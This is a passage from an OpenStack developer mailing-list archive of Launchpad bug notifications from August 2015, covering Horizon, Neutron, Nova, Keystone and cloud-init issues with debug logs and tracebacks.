[Yahoo-eng-team] [Bug 1487271] [NEW] success_url miss 'reverse_lazy' in admin volume type panel

2015-08-20 Thread qiaomin032
Public bug reported:

In the admin volume type panel,  several success_url in views miss 
'reverse_lazy', this result in the cancel action  redirect to wrong url.  For 
example, when right click the "Create Volume Type" button and open a new page, 
click the Cancel button will cast error.
See the attachment for more detail.

** Affects: horizon
 Importance: Undecided
 Status: New

** Attachment added: "admin_volume_type.jpg"
   
https://bugs.launchpad.net/bugs/1487271/+attachment/4449947/+files/admin_volume_type.jpg

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487271

Title:
  success_url miss 'reverse_lazy' in admin volume type panel

Status in OpenStack Dashboard (Horizon):
  New

Bug description:
  In the admin volume type panel,  several success_url in views miss 
'reverse_lazy', this result in the cancel action  redirect to wrong url.  For 
example, when right click the "Create Volume Type" button and open a new page, 
click the Cancel button will cast error.
  See the attachment for more detail.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487271/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487275] [NEW] add an API to show services registered in neutron deployment

2015-08-20 Thread yong sheng gong
Public bug reported:

problem description:
===

There is no API for operator to know what kind of services enabled by
neutron via 'service_plugins' in neutron.conf.

After change:
==
provides an API for administrator to look up the services enabled in neutron.

** Affects: neutron
 Importance: Undecided
 Assignee: yong sheng gong (gongysh)
 Status: New

** Changed in: neutron
 Assignee: (unassigned) => yong sheng gong (gongysh)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487275

Title:
  add an API to show services registered in neutron deployment

Status in neutron:
  New

Bug description:
  problem description:
  ===

  There is no API for operator to know what kind of services enabled by
  neutron via 'service_plugins' in neutron.conf.

  After change:
  ==
  provides an API for administrator to look up the services enabled in neutron.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487275/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1450963] Re: can_access caching is storing too much data in the session

2015-08-20 Thread Lin Hua Cheng
Didn't have time to work on the BP, re-opening this bug instead

** Changed in: horizon
   Status: Invalid => Confirmed

** Changed in: horizon
Milestone: None => liberty-3

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1450963

Title:
  can_access caching is storing too much data in the session

Status in OpenStack Dashboard (Horizon):
  Confirmed

Bug description:
  This accounts for 34% of the session size.

  Related patch: https://review.openstack.org/#/c/120790/

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1450963/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1482772] Re: Region filtering for endpoints does not work

2015-08-20 Thread Lin Hua Cheng
No need to fix OSC, KSC will perform the translation from region to
region_id.

** Changed in: python-openstackclient
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1482772

Title:
  Region filtering for endpoints does not work

Status in Keystone:
  In Progress
Status in python-keystoneclient:
  Confirmed
Status in python-openstackclient:
  Invalid

Bug description:
  When i run “openstack endpoint list --os-url http://192.168.33.10:5000/v3 
--os-identity-api-version=3 --service identity --interface public --region 
RegionTwo” i would expect that it only lists endpoints from RegionTwo. But i 
get the identity endpoint from RegionOne. Here is the output:
  
+--+---+--+--+-+---++
  | ID   | Region| Service Name | Service Type 
| Enabled | Interface | URL|
  
+--+---+--+--+-+---++
  | 4b3efc615c044fb4a2c70ca2e5e7bba9 | RegionOne | keystone | identity 
| True| public| http://192.168.33.10:5000/v2.0 |
  
+--+---+--+--+-+---++

  As this snippet from the debug output from openstackclient shows, the
  client sends the correct query to keystone. So i assume this is a
  filtering problem in keystone.

  DEBUG: requests.packages.urllib3.connectionpool "GET 
/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6®ion=RegionTwo
 HTTP/1.1" 200 506
  DEBUG: keystoneclient.session RESP: [200] content-length: 506 vary: 
X-Auth-Token keep-alive: timeout=5, max=96 server: Apache/2.4.7 (Ubuntu) 
connection: Keep-Alive date: Fri, 07 Aug 2015 19:37:08 GMT content-type: 
application/json x-openstack-request-id: 
req-72481573-7fff-4ae0-9a2f-33584b476bd3
  RESP BODY: {"endpoints": [{"region_id": "RegionOne", "links": {"self": 
"http://192.168.33.10:35357/v3/endpoints/4b3efc615c044fb4a2c70ca2e5e7bba9"}, 
"url": "http://192.168.33.10:5000/v2.0";, "region": "RegionOne", "enabled": 
true, "interface": "public", "service_id": "050872861656437184778a822032d8d6", 
"id": "4b3efc615c044fb4a2c70ca2e5e7bba9"}], "links": {"self": 
"http://192.168.33.10:35357/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6®ion=RegionTwo";,
 "previous": null, "next": null}}

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1482772/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1351215] Re: Outdated information in post live-migration notification

2015-08-20 Thread Zhenzan Zhou
Tried with latest code, and get the notifications in congress nova
driver:

live migration from node-01 (source node, also controller node) to
node-02 (dest node):

2015-08-21 03:26:36.717 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-02:compute.instance.live_migration.pre.start
2015-08-21 03:26:36.717 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:36.718 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:39.648 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-02:compute.instance.live_migration.pre.end
2015-08-21 03:26:39.649 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:39.649 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:45.220 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-01:compute.instance.live_migration._post.start
2015-08-21 03:26:45.220 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:45.221 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:46.098 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-01:compute.instance.live_migration._post.end
2015-08-21 03:26:46.099 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:46.099 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:46.225 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from 
compute.node-02:compute.instance.live_migration.post.dest.start
2015-08-21 03:26:46.226 INFO congress.datasources.nova_driver [-] Info: 
state_description = migrating, state = active
2015-08-21 03:26:46.226 INFO congress.datasources.nova_driver [-] Info: node = 
node-01, host = node-01
2015-08-21 03:26:47.003 INFO congress.datasources.nova_driver [-] Info: Handled 
notification from compute.node-02:compute.instance.live_migration.post.dest.end
2015-08-21 03:26:47.003 INFO congress.datasources.nova_driver [-] Info: 
state_description = , state = active
2015-08-21 03:26:47.003 INFO congress.datasources.nova_driver [-] Info: node = 
node-02, host = node-02

So in event compute.instance.live_migration._post.end which is sent by
source node, the state_description is still 'migrating', and it's right
to still use the source node and host.   So I'll mark it as invalid.

** Changed in: nova
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1351215

Title:
  Outdated information in post live-migration notification

Status in OpenStack Compute (nova):
  Invalid

Bug description:
  compute.instance.live_migration._post.end rpc notification gives
  outdated information about state, host, node (at least)

  compute.instance.live_migration.pre.start (source node)
  compute.instance.live_migration.pre.end (source node)
  compute.instance.live_migration._post.start (source node)
  compute.instance.live_migration.post.dest.start (destination node)
  compute.instance.live_migration.post.dest.end (destination node)
  compute.instance.live_migration._post.end (again source node with non-changed 
instance object data, with outdated info)

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1351215/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487271] Re: success_url miss 'reverse_lazy' in admin volume type panel

2015-08-20 Thread qiaomin032
** Changed in: horizon
   Status: In Progress => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487271

Title:
  success_url miss 'reverse_lazy' in admin volume type panel

Status in OpenStack Dashboard (Horizon):
  Invalid

Bug description:
  In the admin volume type panel,  several success_url in views miss 
'reverse_lazy', this result in the cancel action  redirect to wrong url.  For 
example, when right click the "Create Volume Type" button and open a new page, 
click the Cancel button will cast error.
  See the attachment for more detail.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487271/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487295] [NEW] success_url miss 'reverse_lazy' in admin volume type panel

2015-08-20 Thread qiaomin032
Public bug reported:

In the admin volume type panel, several success_url in views miss 
'reverse_lazy', this result in the cancel action redirect to wrong url. For 
example, when right click the "Create Volume Type" button and open a new page, 
click the Cancel button will cast error.
See the attachment for more detail.

** Affects: horizon
 Importance: Undecided
 Assignee: qiaomin032 (chen-qiaomin)
 Status: In Progress

** Attachment added: "admin_volume_type.jpg"
   
https://bugs.launchpad.net/bugs/1487295/+attachment/4449983/+files/admin_volume_type.jpg

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487295

Title:
  success_url miss 'reverse_lazy' in admin volume type panel

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  In the admin volume type panel, several success_url in views miss 
'reverse_lazy', this result in the cancel action redirect to wrong url. For 
example, when right click the "Create Volume Type" button and open a new page, 
click the Cancel button will cast error.
  See the attachment for more detail.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487295/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487300] [NEW] Misaligned partitions for ephemeral drives (Xenapi)

2015-08-20 Thread Brooks Kaminski
Public bug reported:

Currently the code creates a mis-aligned partition on the ephemeral
drive during disk creation.  This is done by the code attempting to
create the partition at the 0 sector which then defaults to 1.  When
attempting to replicate this setup by hand using parted (as the code
does) it will alert you of the misalignment such as:

test@testbox:~# parted --script /dev/xvde -- mkpart primary 0 -0
Warning: The resulting partition is not properly aligned for best performance.

This results in the possibility of significantly slower read speeds
against the disk, and some impact against the write speeds.  The
relevant code responsible for the ephemeral partition size configuration
can be found at:

https://github.com/openstack/nova/blob/master/nova/virt/xenapi/vm_utils.py#L1043-L1057

And the actual parted command utilizing this can be found here:

https://github.com/openstack/nova/blob/master/nova/virt/xenapi/vm_utils.py#L992-L1006

I have already committed a simple change for this awaiting review --
Change ID: I2b33659d66ce5ba8a361386277c5fee47ddcde94

https://review.openstack.org/#/c/203323/

Testing for this bug can be accomplished by creating a VM with an
ephemeral drive and monitoring r/w speeds with the default partitioning
and then with custom partitioning (2048 start sector) using dd/hdparm,
etc.

** Affects: nova
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487300

Title:
  Misaligned partitions for ephemeral drives (Xenapi)

Status in OpenStack Compute (nova):
  New

Bug description:
  Currently the code creates a mis-aligned partition on the ephemeral
  drive during disk creation.  This is done by the code attempting to
  create the partition at the 0 sector which then defaults to 1.  When
  attempting to replicate this setup by hand using parted (as the code
  does) it will alert you of the misalignment such as:

  test@testbox:~# parted --script /dev/xvde -- mkpart primary 0 -0
  Warning: The resulting partition is not properly aligned for best performance.

  This results in the possibility of significantly slower read speeds
  against the disk, and some impact against the write speeds.  The
  relevant code responsible for the ephemeral partition size
  configuration can be found at:

  
https://github.com/openstack/nova/blob/master/nova/virt/xenapi/vm_utils.py#L1043-L1057

  And the actual parted command utilizing this can be found here:

  
https://github.com/openstack/nova/blob/master/nova/virt/xenapi/vm_utils.py#L992-L1006

  I have already committed a simple change for this awaiting review --
  Change ID: I2b33659d66ce5ba8a361386277c5fee47ddcde94

  https://review.openstack.org/#/c/203323/

  Testing for this bug can be accomplished by creating a VM with an
  ephemeral drive and monitoring r/w speeds with the default
  partitioning and then with custom partitioning (2048 start sector)
  using dd/hdparm, etc.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487300/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487322] [NEW] fullstack oslo messaging deprecation warning for configuration

2015-08-20 Thread Miguel Angel Ajo
Public bug reported:

In the fullstack run logs for server and agents you can find this.

2015-08-20 12:36:28.369 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_virtual_host" from group "DEFAULT" is deprecated. Use option 
"rabbit_virtual_host" from group "oslo_messaging_rabbit".
2015-08-20 12:36:28.369 1898 WARNING oslo_config.cfg [-] Option "rabbit_hosts" 
from group "DEFAULT" is deprecated. Use option "rabbit_hosts" from group 
"oslo_messaging_rabbit".
2015-08-20 12:36:28.370 1898 WARNING oslo_config.cfg [-] Option "rabbit_userid" 
from group "DEFAULT" is deprecated. Use option "rabbit_userid" from group 
"oslo_messaging_rabbit".
2015-08-20 12:36:28.370 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_password" from group "DEFAULT" is deprecated. Use option 
"rabbit_password" from group "oslo_messaging_rabbit".

** Affects: neutron
 Importance: Undecided
 Status: New


** Tags: fullstack

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487322

Title:
  fullstack oslo messaging deprecation warning for configuration

Status in neutron:
  New

Bug description:
  In the fullstack run logs for server and agents you can find this.

  2015-08-20 12:36:28.369 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_virtual_host" from group "DEFAULT" is deprecated. Use option 
"rabbit_virtual_host" from group "oslo_messaging_rabbit".
  2015-08-20 12:36:28.369 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_hosts" from group "DEFAULT" is deprecated. Use option "rabbit_hosts" 
from group "oslo_messaging_rabbit".
  2015-08-20 12:36:28.370 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_userid" from group "DEFAULT" is deprecated. Use option "rabbit_userid" 
from group "oslo_messaging_rabbit".
  2015-08-20 12:36:28.370 1898 WARNING oslo_config.cfg [-] Option 
"rabbit_password" from group "DEFAULT" is deprecated. Use option 
"rabbit_password" from group "oslo_messaging_rabbit".

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487322/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487323] [NEW] Grammar misses in manual “Networking API v2.0 (CURRENT)”

2015-08-20 Thread zhangjingwen
Public bug reported:

1.The description in manual is as below:
"Use virtual networking services among devices that are managed by the 
OpenStack Compute serviceEnables users to associate IP address blocks and 
other network configuration settings with an OpenStack Networking network. "

Because "Use" is used by the first sentence and it is imperative
sentence, "Enables" in the last sentence is not correct. I think it
should be "Enable".

2.The description in same location as above  is as below:
"The Networking (neutron) API v2.0 combines the API v1.1 functionality with 
some essential Internet Protocol Address Management (IPAM) functionality." 

Because "some" is used and i think "some" here does not mean "certain",
the last "functionality" should be "functionalities".

3.The description in same location as above  is as below:
"Enables users to associate IP address blocks and other network configuration 
settings with an OpenStack Networking network. You can choose a specific IP 
address from the block or let OpenStack Networking choose the first available 
IP address. "

Acorrding to the context, the "block" in the last sentence should be
"blocks".

** Affects: neutron
 Importance: Undecided
 Assignee: zhangjingwen (zhangjingwen)
 Status: New

** Changed in: neutron
 Assignee: (unassigned) => zhangjingwen (zhangjingwen)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487323

Title:
  Grammar misses in manual “Networking API v2.0 (CURRENT)”

Status in neutron:
  New

Bug description:
  1.The description in manual is as below:
  "Use virtual networking services among devices that are managed by the 
OpenStack Compute serviceEnables users to associate IP address blocks and 
other network configuration settings with an OpenStack Networking network. "

  Because "Use" is used by the first sentence and it is imperative
  sentence, "Enables" in the last sentence is not correct. I think it
  should be "Enable".

  2.The description in same location as above  is as below:
  "The Networking (neutron) API v2.0 combines the API v1.1 functionality with 
some essential Internet Protocol Address Management (IPAM) functionality." 

  Because "some" is used and i think "some" here does not mean
  "certain", the last "functionality" should be "functionalities".

  3.The description in same location as above  is as below:
  "Enables users to associate IP address blocks and other network configuration 
settings with an OpenStack Networking network. You can choose a specific IP 
address from the block or let OpenStack Networking choose the first available 
IP address. "

  Acorrding to the context, the "block" in the last sentence should be
  "blocks".

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487323/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1311463] Re: disk-setup unable to partition disks

2015-08-20 Thread Mathew Hodson
** Changed in: cloud-init (Ubuntu Utopic)
   Status: Confirmed => Won't Fix

** Changed in: cloud-init (Ubuntu Precise)
   Importance: Undecided => Medium

** Changed in: cloud-init (Ubuntu Trusty)
   Importance: Undecided => Medium

** Tags added: precise trusty

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1311463

Title:
  disk-setup unable to partition disks

Status in cloud-init:
  Fix Committed
Status in cloud-init package in Ubuntu:
  Fix Released
Status in cloud-init source package in Precise:
  Confirmed
Status in cloud-init source package in Trusty:
  Confirmed
Status in cloud-init source package in Utopic:
  Won't Fix

Bug description:
  The problem is with is_disk_used in cc_disk_setup.py

  use_count is an array, which doesn't have a splitlines attribute.
  This is broken on ubuntu precise 12.04 with the latest updates.

  def is_disk_used(device):
  """
  Check if the device is currently used. Returns true if the device
  has either a file system or a partition entry
  is no filesystem found on the disk.
  """

  # If the child count is higher 1, then there are child nodes
  # such as partition or device mapper nodes
  use_count = [x for x in enumerate_disk(device)]
  if len(use_count.splitlines()) > 1:
  return True

  # If we see a file system, then its used
  _, check_fstype, _ = check_fs(device)
  if check_fstype:
  return True

  return False

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1311463/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487324] [NEW] failed to list qos rule type due to policy check

2015-08-20 Thread yong sheng gong
Public bug reported:

2015-08-21 13:52:36.212 23375 INFO neutron.wsgi [-] (23375) accepted 
('192.168.1.118', 43606)
2015-08-21 13:52:42.711 ERROR neutron.policy 
[req-ba182095-d12d-4bde-a47e-88507e4c4898 demo demo] Unable to verify 
match:%(tenant_id)s as the parent resource: tenant was not found
2015-08-21 13:52:42.711 23375 ERROR neutron.policy Traceback (most recent call 
last):
2015-08-21 13:52:42.711 23375 ERROR neutron.policy   File 
"/mnt/data3/opt/stack/neutron/neutron/policy.py", line 224, in __call__
2015-08-21 13:52:42.711 23375 ERROR neutron.policy parent_res, parent_field 
= do_split(separator)
2015-08-21 13:52:42.711 23375 ERROR neutron.policy   File 
"/mnt/data3/opt/stack/neutron/neutron/policy.py", line 219, in do_split
2015-08-21 13:52:42.711 23375 ERROR neutron.policy separator, 1)
2015-08-21 13:52:42.711 23375 ERROR neutron.policy ValueError: need more than 1 
value to unpack
2015-08-21 13:52:42.711 23375 ERROR neutron.policy
2015-08-21 13:52:42.714 ERROR neutron.api.v2.resource 
[req-ba182095-d12d-4bde-a47e-88507e4c4898 demo demo] index failed
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource Traceback (most 
recent call last):
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/api/v2/resource.py", line 83, in resource
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource result = 
method(request=request, **args)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/api/v2/base.py", line 339, in index
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource return 
self._items(request, True, parent_id)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/api/v2/base.py", line 279, in _items
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource 
pluralized=self._collection)]
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/policy.py", line 354, in check
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource 
pluralized=pluralized)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/usr/lib/python2.7/site-packages/oslo_policy/policy.py", line 487, in enforce
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource result = 
rule(target, creds, self)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/usr/lib/python2.7/site-packages/oslo_policy/_checks.py", line 238, in __call__
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource return 
enforcer.rules[self.match](target, creds, enforcer)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/usr/lib/python2.7/site-packages/oslo_policy/_checks.py", line 238, in __call__
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource return 
enforcer.rules[self.match](target, creds, enforcer)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/usr/lib/python2.7/site-packages/oslo_policy/_checks.py", line 191, in __call__
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource if rule(target, 
cred, enforcer):
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource   File 
"/mnt/data3/opt/stack/neutron/neutron/policy.py", line 246, in __call__
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource 
reason=err_reason)
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource PolicyCheckError: 
Failed to check policy tenant_id:%(tenant_id)s because Unable to verify 
match:%(tenant_id)s as the parent resource: tenant was not found
2015-08-21 13:52:42.714 23375 ERROR neutron.api.v2.resource


$ neutron qos-available-rule-types  -v
DEBUG: keystoneclient.session REQ: curl -g -i -X GET 
http://172.17.42.1:5000/v2.0 -H "Accept: application/json" -H "User-Agent: 
python-keystoneclient"
DEBUG: keystoneclient.session RESP: [200] Content-Length: 337 Vary: 
X-Auth-Token Connection: keep-alive Date: Fri, 21 Aug 2015 05:52:35 GMT 
Content-Type: application/json X-Openstack-Request-Id: 
req-3ff33f59-d69b-412a-8137-0ce5f6deb868 
RESP BODY: {"version": {"status": "stable", "updated": "2014-04-17T00:00:00Z", 
"media-types": [{"base": "application/json", "type": 
"application/vnd.openstack.identity-v2.0+json"}], "id": "v2.0", "links": 
[{"href": "http://172.17.42.1:5000/v2.0/";, "rel": "self"}, {"href": 
"http://docs.openstack.org/";, "type": "text/html", "rel": "describedby"}]}}

DEBUG: stevedore.extension found extension EntryPoint.parse('yaml = 
clifftablib.formatters:YamlFormatter')
DEBUG: stevedore.extension found extension EntryPoint.parse('json = 
clifftablib.formatters:JsonFormatter')
DEBUG: stevedore.extension found extension EntryPoint.parse('html = 
clifftablib.formatters:HtmlFormatter')
DEBUG: stevedore.extension found extension EntryPoint.parse('table = 
cliff.formatters.table:TableFormatter')
DEBUG: stevedore.extension found extension EntryPoint.parse('csv = 
cliff.format

[Yahoo-eng-team] [Bug 1487335] [NEW] Neutrondrivers should throw specific error instead for 500 internal server

2015-08-20 Thread Ashish Kumar Gupta
Public bug reported:

Implementing new mech driver for neutron  not getting the proper error reply 
from the neutron driver code.
For Error from the implemented mech driver :
DBDuplicateEntry: (IntegrityError) 
MechanismDriverError: create_port_precommit failed.

Error Thrown :
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=UTF-8
Content-Length: 108
X-Openstack-Request-Id: req-efd3e486-23e4-4699-ad74-7c28e8b7c6bf
Date: Wed, 19 Aug 2015 11:00:30 GMT

** Affects: neutron
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487335

Title:
  Neutrondrivers should throw specific error instead for 500 internal
  server

Status in neutron:
  New

Bug description:
  Implementing new mech driver for neutron  not getting the proper error reply 
from the neutron driver code.
  For Error from the implemented mech driver :
  DBDuplicateEntry: (IntegrityError) 
  MechanismDriverError: create_port_precommit failed.

  Error Thrown :
  HTTP/1.1 500 Internal Server Error
  Content-Type: application/json; charset=UTF-8
  Content-Length: 108
  X-Openstack-Request-Id: req-efd3e486-23e4-4699-ad74-7c28e8b7c6bf
  Date: Wed, 19 Aug 2015 11:00:30 GMT

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487335/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp